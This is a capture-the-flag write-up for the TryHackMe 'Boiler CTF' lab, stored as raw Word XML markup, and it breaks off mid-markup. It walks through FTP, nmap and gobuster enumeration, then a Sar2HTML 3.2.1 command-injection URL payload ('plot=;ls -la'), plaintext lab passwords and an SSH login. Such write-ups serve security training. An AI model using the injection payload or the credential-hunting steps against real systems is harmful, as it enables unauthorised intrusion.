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6AB8" w14:textId="77777777" w:rsidR="00461A53" w:rsidRPr="00461A53" w:rsidRDefault="00461A53" w:rsidP="00461A53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1F2328"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48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b/>
          <w:bCs/>
          <w:color w:val="1F2328"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Boiler CTF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F3FDD2" w14:textId="77777777" w:rsidR="00461A53" w:rsidRPr="00461A53" w:rsidRDefault="00461A53" w:rsidP="00461A5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Intermediate level CTF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295D2733" w14:textId="77777777" w:rsidR="00461A53" w:rsidRPr="00461A53" w:rsidRDefault="00461A53" w:rsidP="00461A5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5" w:history="1">
        <w:r w:rsidRPr="00461A53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Boiler CTF</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="75B5950F" w14:textId="77777777" w:rsidR="00461A53" w:rsidRPr="00461A53" w:rsidRDefault="00461A53" w:rsidP="00461A53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Topic's</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52244FDE" w14:textId="77777777" w:rsidR="00461A53" w:rsidRPr="00461A53" w:rsidRDefault="00461A53" w:rsidP="00461A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FTP Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5618D562" w14:textId="77777777" w:rsidR="00461A53" w:rsidRPr="00461A53" w:rsidRDefault="00461A53" w:rsidP="00461A53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Network Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BEF35C" w14:textId="77777777" w:rsidR="00461A53" w:rsidRPr="00461A53" w:rsidRDefault="00461A53" w:rsidP="00461A53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Web Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658AD355" w14:textId="77777777" w:rsidR="00461A53" w:rsidRPr="00461A53" w:rsidRDefault="00461A53" w:rsidP="00461A53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 xml:space="preserve">Exploitation </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Joomle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> Sar2HTML 3.2.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DA4597" w14:textId="77777777" w:rsidR="00461A53" w:rsidRPr="00461A53" w:rsidRDefault="00461A53" w:rsidP="00461A53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Stored Passwords &amp; Keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AC5FEF" w14:textId="77777777" w:rsidR="00461A53" w:rsidRPr="00461A53" w:rsidRDefault="00461A53" w:rsidP="00461A53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Abusing SUID/GUID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E948DD" w14:textId="77777777" w:rsidR="00461A53" w:rsidRPr="00461A53" w:rsidRDefault="00461A53" w:rsidP="00461A53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Appendix archive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309D157C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Password: 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1 kn0w 1 5h0uldn'7!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154E0FAA" w14:textId="77777777" w:rsidR="00461A53" w:rsidRPr="00461A53" w:rsidRDefault="00461A53" w:rsidP="00461A53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Task 1 Questions #1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBBA986" w14:textId="77777777" w:rsidR="00461A53" w:rsidRPr="00461A53" w:rsidRDefault="00461A53" w:rsidP="00461A5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Intermediate level CTF. Just enumerate, you'll get there.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30635F6F" w14:textId="77777777" w:rsidR="00461A53" w:rsidRPr="00461A53" w:rsidRDefault="00461A53" w:rsidP="00461A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File extension after anon login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F50F26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/Boiler CTF$ ftp 10.10.57.168</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7115E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Connected to 10.10.57.168.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0062957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220 (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vsFTPd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3.0.3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610BC4F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Name (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10.10.57.168:kali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): anonymous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8F814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230 Login successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5EA72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Remote system type is UNIX.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2940604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Using binary mode to transfer files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B9A80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ftp&gt; ls -la</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6F1B0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200 PORT command successful. Consider using PASV.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676C041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150 Here comes the directory listing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E6344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   2 ftp  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ftp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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6FA78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   2 ftp  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ftp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22  2019 ..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="657A16C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-r--r--    1 ftp  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ftp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       74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21  2019 .info.txt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="17C856A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226 Directory send OK.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB17C1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ftp&gt;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get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info.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F2715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local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info.txt remote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info.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F41C7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200 PORT command successful. Consider using PASV.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F4914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150 Opening BINARY mode data connection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for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info.txt (74 bytes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6575B29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226 Transfer complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5169C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74 bytes received in 0.00 secs (87.1720 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2153DB1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ftp&gt;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pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="290925D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257 "/" is the current directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFCDE0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ftp&gt; cd /home</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DE8C3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550 Failed to change directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B69D8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ftp&gt; cd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..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="29C64C0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250 Directory successfully changed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375FE91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ftp&gt;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pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="757EA9F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257 "/" is the current directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174B5DE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ftp&gt; exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415EDD8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221 Goodbye.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F64959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/Boiler CTF$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cat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info.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CBF27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Whfg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jnagrq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gb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frr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vs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lbh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svaq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vg.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Yby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.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Erzrzore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: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Rahzrengvba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vf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gur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xrl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!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2177A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/Boiler CTF$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cat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info.txt | tr '[A-Za-z]' '[N-ZA-Mn-za-m]'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF812E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Just wanted to see if you find it. Lol. Remember: Enumeration is the key!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F99645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txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3206CAB4" w14:textId="77777777" w:rsidR="00461A53" w:rsidRPr="00461A53" w:rsidRDefault="00461A53" w:rsidP="00461A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What is on the highest port?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499B3BF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/Boiler CTF$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sudo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nmap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sS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sC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sV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-O -p- 10.10.57.168Starting Nmap 7.80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 https://nmap.org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) at 2020-10-07 14:07 CEST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63589E7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Nmap scan report for 10.10.57.168</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C4215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Host is up (0.056s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5440900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Not shown: 65531 closed ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE1381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PORT      STATE SERVICE VERSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A31163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21/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tcp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open  ftp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vsftpd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3.0.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682DB8E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|_ftp-anon: Anonymous FTP login allowed (FTP code 230)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1B8B5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ftp-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syst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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BCD05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STAT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A913D4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FTP server status:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E86B9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|      Connected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to ::ffff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:10.8.106.222</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F744C6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Logged in as ftp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA50A3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TYPE: ASCII</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15862CF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No session bandwidth limit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5778983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Session timeout in seconds is 300</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48733EB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Control connection is plain text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0839745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Data connections will be plain text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F318F4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   At session startup, client count was 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B52E79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|  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vsFTPd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3.0.3 - secure, fast, stable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468C7B2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|_End of status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165D707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80/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tcp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open  http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Apache httpd 2.4.18 ((Ubuntu))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AF80C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http-robots.txt: 1 disallowed entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEB66E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|_/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD83A6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|_http-server-header: Apache/2.4.18 (Ubuntu)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B459D5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|_http-title: Apache2 Ubuntu Default Page: It works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B212A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10000/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tcp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open  http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MiniServ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1.930 (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Webmin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httpd)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4282A12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|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286C509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|_http-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trane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-info: Problem with XML parsing of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evox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/about</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5DB13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55007/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tcp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open  ssh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 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6543F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ssh-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hostkey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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06ECDCD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2048 e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3:ab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:e1:39:2d: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95:eb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13:55:16:d6:ce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:8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d:f9:11:e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5 (RSA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E08E2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   256 ae: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de:f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2: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bb:b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7:8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a:00:70:20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:74:56:76:25:c0:df:38 (ECDSA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBA3F8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|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_  256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25:25:83:f2:a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7:75:8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a:a0:46:b2:12:70:04:68:5c:cb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(ED25519)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6024750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No exact OS matches for host (If you know what OS is running on it, see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https://nmap.org/submit/ )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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A9D2C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TCP/IP fingerprint:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B08CCB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OS:SCAN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(V=7.80%E=4%D=10/7%OT=21%CT=1%CU=42115%PV=Y%DS=2%DC=I%G=Y%TM=5F7DAFE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA2D5B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OS:A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%P=x86_64-pc-linux-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gnu)SEQ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(SP=105%GCD=1%ISR=107%TI=Z%CI=I%II=I%TS=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8)SEQ</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="70ED6E4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OS:(SP=105%GCD=1%ISR=107%TI=Z%TS=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A)OPS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(O1=M508ST11NW6%O2=M508ST11NW6%O3=M50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAD48E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OS:8NNT11NW6%O4=M508ST11NW6%O5=M508ST11NW6%O6=M508ST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11)WIN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(W1=68DF%W2=68DF%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D1AF8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OS:W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3=68DF%W4=68DF%W5=68DF%W6=68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DF)ECN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(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW6%CC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284805C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OS:=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Y%Q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=)ECN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(R=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1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q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2(R=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3(R=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4(R=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1218B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OS:Y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%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q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5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474B805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OS:R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%O=%RD=0%Q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6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q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=)T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7(R=Y%DF=Y%T=4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3686A11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OS:0%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q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=)U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1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DE6D8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OS:G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%RIPCK=G%RUCK=G%RUD=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G)IE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(R=Y%DFI=N%T=40%CD=S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211DD30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10348ED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Network Distance: 2 hops</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B59119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Service Info: OSs: Unix, Linux; CPE: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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cpe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o:linux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:linux_kernel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3304CA3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59CF4DB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OS and Service detection performed. Please report any incorrect results at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https://nmap.org/submit/ .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="00E5513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Nmap done: 1 IP address (1 host up) scanned in 89.41 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7869FF8D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SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157DAA21" w14:textId="77777777" w:rsidR="00461A53" w:rsidRPr="00461A53" w:rsidRDefault="00461A53" w:rsidP="00461A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What's running on port 10000?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F47434" w14:textId="77777777" w:rsidR="00461A53" w:rsidRPr="00461A53" w:rsidRDefault="00461A53" w:rsidP="00461A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6" w:history="1">
        <w:r w:rsidRPr="00461A53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https://10.10.57.168:10000/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D1ABBEC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Webmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="55A7F5B8" w14:textId="77777777" w:rsidR="00461A53" w:rsidRPr="00461A53" w:rsidRDefault="00461A53" w:rsidP="00461A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Can you exploit the service running on that port? (yay/nay answer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278A7B65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nay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06ACAC95" w14:textId="77777777" w:rsidR="00461A53" w:rsidRPr="00461A53" w:rsidRDefault="00461A53" w:rsidP="00461A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What's CMS can you access?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2965904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/Boiler CTF$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gobuster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dir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-w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/share/wordlists/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dirbuster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/directory-list-2.3-medium.txt -u http://10.10.57.168/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385C6D2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===============================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD3381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Gobuster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v3.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1BD7E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by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@_FireFart_)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D364A9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===============================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D8CAB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Url:            http://10.10.57.168/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E4AC8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Threads:        10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BCD5F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Wordlist:      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/share/wordlists/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dirbuster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/directory-list-2.3-medium.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276A6EA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Status codes:   200,204,301,302,307,401,403</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3922EBE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[+] User Agent: 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gobuster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/3.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC0FFD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[+] Timeout:        10s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0622DB4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===============================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0243114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2020/10/07 13:36:23 Starting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gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="61FAAC8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===============================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B8B74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manual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(Status: 301)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115C8E5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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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joomla</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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(Status: 301)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CD6E2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/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server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-status (Status: 403)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3206CF9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Progress: 105022 / 220561 (47.62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%)^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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A579BE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[!] Keyboard interrupt detected, terminating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E045C36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joomla</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="28524A0D" w14:textId="77777777" w:rsidR="00461A53" w:rsidRPr="00461A53" w:rsidRDefault="00461A53" w:rsidP="00461A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Keep enumerating, you'll know when you find it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EFA4AB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No answer needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8D2D0E" w14:textId="77777777" w:rsidR="00461A53" w:rsidRPr="00461A53" w:rsidRDefault="00461A53" w:rsidP="00461A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The interesting file name in the folder?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2606525F" w14:textId="77777777" w:rsidR="00461A53" w:rsidRPr="00461A53" w:rsidRDefault="00461A53" w:rsidP="00461A5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7" w:history="1">
        <w:r w:rsidRPr="00461A53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http://10.10.57.168/joomla/_files/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5B92C9A5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VjJodmNITnBaU0JrWVdsemVRbz0K</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294EB58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/Boiler CTF$ echo "VjJodmNITnBaU0JrWVdsemVRbz0K" | base64 -d | base64 -d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B97D0A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Whopsie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daisy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2CFFEC" w14:textId="77777777" w:rsidR="00461A53" w:rsidRPr="00461A53" w:rsidRDefault="00461A53" w:rsidP="00461A5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8" w:history="1">
        <w:r w:rsidRPr="00461A53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http://10.10.57.168/joomla/_test/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4B62C55E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sar2html </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273A8FAD" w14:textId="77777777" w:rsidR="00461A53" w:rsidRPr="00461A53" w:rsidRDefault="00461A53" w:rsidP="00461A5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9" w:history="1">
        <w:r w:rsidRPr="00461A53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Sar2HTML 3.2.1 - Remote Command Execution</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0CA6A23D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http://&lt;ipaddr&gt;/index.php?plot=;&lt;command-here&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAAAF16" w14:textId="77777777" w:rsidR="00461A53" w:rsidRPr="00461A53" w:rsidRDefault="00461A53" w:rsidP="00461A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hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00461A53">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0969DA"/>
            <w:kern w:val="0"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="en-GB"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>http://10.10.57.168/joomla/_test/index.php?plot=;ls%20-la</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="020BD04A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superduperp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@$$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A424C93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log.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8064E3" w14:textId="77777777" w:rsidR="00461A53" w:rsidRPr="00461A53" w:rsidRDefault="00461A53" w:rsidP="00461A53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b/>
          <w:bCs/>
          <w:color w:val="1F2328"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Task 2 Questions #2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AB663A" w14:textId="77777777" w:rsidR="00461A53" w:rsidRPr="00461A53" w:rsidRDefault="00461A53" w:rsidP="00461A5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You can complete this with manual enumeration, but do it as you wish</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7DB26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kali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/CTFs/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tryhackme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/Boiler CTF$ ssh basterd@10.10.57.168 -p 55007</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5731485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basterd@10.10.57.168's password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B143A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Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-142-generic i686)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637CC51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44A1ED6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* Documentation:  https://help.ubuntu.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131C7CE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* Management:     https://landscape.canonical.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F07B8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* Support:        https://ubuntu.com/advantage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BF496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4F6EBA3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8 packages can be updated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EAE81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8 updates are security updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD6637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5EB3A7E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2D3CF53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Last login: Thu Aug 22 12:29:45 2019 from 192.168.1.199</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16978CC8" w14:textId="77777777" w:rsidR="00461A53" w:rsidRPr="00461A53" w:rsidRDefault="00461A53" w:rsidP="00461A5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 xml:space="preserve">Where was the other users pass </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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stored(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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no extension, just the name)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0093A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ls -la</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642DFE1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total 16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537A3CB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-x--- 3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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1378B37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4 root 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22  2019 ..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="188AAF4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stoner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699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21  2019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backup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B73341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------- 1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 0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.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bash_history</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2DA18B5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------ 2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 .cache</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="296BDC5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/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F14EA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cat backup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2963FE7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REMOTE=1.2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C26F1B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7D14511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SOURCE=/home/stoner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F79095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TARGET=/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/local/backup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316780C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6AC3508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LOG=/home/stoner/bck.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F4C11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059FF00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DATE=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`date +%y</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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\.%m\.%d\.`</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="63C865F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19FC35E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USER=stoner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BADC1B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59636E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>#superduperp@$$no1knows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53ECF2D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442D749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ssh $USER@$REMOTE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mkdir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$TARGET/$DATE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDE346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4D8BFBD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0E499DC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if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[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-d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$SOURCE</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3936D55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for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in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`ls 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$SOURCE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|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 grep '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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data'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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`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;do</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="07A3B36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echo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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Begining</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 copy of"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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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$LOG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E26BB8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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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scp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$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SOURCE/$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$USER@$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REMOTE:$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TARGET/$DATE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF60C7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echo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"completed"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&gt;&gt;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$LOG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60489E1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5CE6FF4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if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[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-n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`ssh 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$USER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@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$REMOTE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 ls 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$TARGET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/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$DATE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/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2&gt;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/dev/null</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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`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]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;then</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="24DB1AF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    rm $SOURCE/$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</w:p>
    <w:p w14:paraId="04A6FC2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echo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"removed"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&gt;&gt;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$LOG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15235BE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echo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"####################"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&gt;&gt;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$LOG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08886AB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               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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74725C6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                    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echo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"Copy not complete"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&gt;&gt;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$LOG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62507DB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                    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exit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0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F2BCB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           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fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3E113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done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B27644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313F47A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63AC59D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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FF38D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</w:p>
    <w:p w14:paraId="0B35532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echo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0A3069"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"Directory is not present"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</w:t>
      </w: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&gt;&gt;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$LOG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C2A820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   </w:t>
      </w:r>
      <w:r w:rsidRPr="00461A53">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:eastAsia="Times New Roman" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="0550AE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>exit</w:t>
      </w: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0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B8A1A1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CF222E"/>
          <w:kern w:val="0"/>
